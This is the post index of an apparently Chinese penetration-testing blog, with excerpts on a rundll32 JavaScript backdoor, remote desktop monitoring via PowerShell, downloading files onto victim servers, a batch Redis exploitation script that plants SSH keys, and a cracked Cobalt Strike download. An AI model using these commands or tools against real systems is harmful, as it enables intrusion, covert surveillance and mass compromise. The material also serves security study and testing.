Evi1cg's blog

  • 首页

  • 标签

  • 分类

  • 归档

  • 工具

  • 友链

  • 搜索

JSbackdoor

发表于 2015-12-18 | 分类于 奇技淫巧

//Execute A Commandrundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScrip ...

阅读全文 »

Use Powershell Stream a target's Desktop

发表于 2015-12-18 | 分类于 奇技淫巧

最近Ninshang的作者又出了一个新的脚本,能够通过powershell对目标的屏幕进行实时监控。
脚本地址如下:
Show-TargetScreen.ps1

使用也很简单,脚本包括了reverse以及bind模式。下面是使用示例:

0x01 Bind模式:

1
2
PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Bind -Port 3333
阅读全文 »

13种方式下载文件

发表于 2015-12-14 | 分类于 技术分享

渗透测试过程中常常遇到需要将文件下载到受害者服务器上,这里介绍15种下载文件的方式,希望能帮助到你。

0x01 Powershell

创建如下PSH脚本:

1
2
$p = New-Object System.Net.WebClient 
$p.DownloadFile("http://domain/file","C:%homepath%file")

执行:

1
PS C:> .test.ps1

如果Powershell禁止执行了,使用如下命令:

1
C:>powershell set-executionpolicy unrestricted

阅读全文 »

redis未授权批量提权脚本(python)

发表于 2015-12-14 | 分类于 工具收集

安装依赖

1
☁  ~ sudo easy_install redis

使用

1
2
3
4
5
6
7
8
9
10
11
12
13
☁  redis  python hackredis.py                                  
usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT]

For Example:
-----------------------------------------------------------------------------
python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22

optional arguments:
-h, --help show this help message and exit
-l IPLIST the hosts of target
-p PORT the redis default port
-r ID_RSAFILE the ssh id_rsa file you generate
-sp SSH_PORT the ssh port
阅读全文 »

Cobalt strike3.0使用手册

发表于 2015-11-11 | 分类于 工具收集

Cobalt strike3.0使用手册

1446785446813.png

0x00 简介

Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用,当然可以结合Armitage进行使用。这里有一个破解版:

下载地址:戳我(自行验证其安全性)

阅读全文 »
1…161718…21
Evi1cg

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。
104 日志
7 分类
54 标签
RSS
GitHub Twitter 微博 E-Mail
whois api
© 2015 – 2022 Evi1cg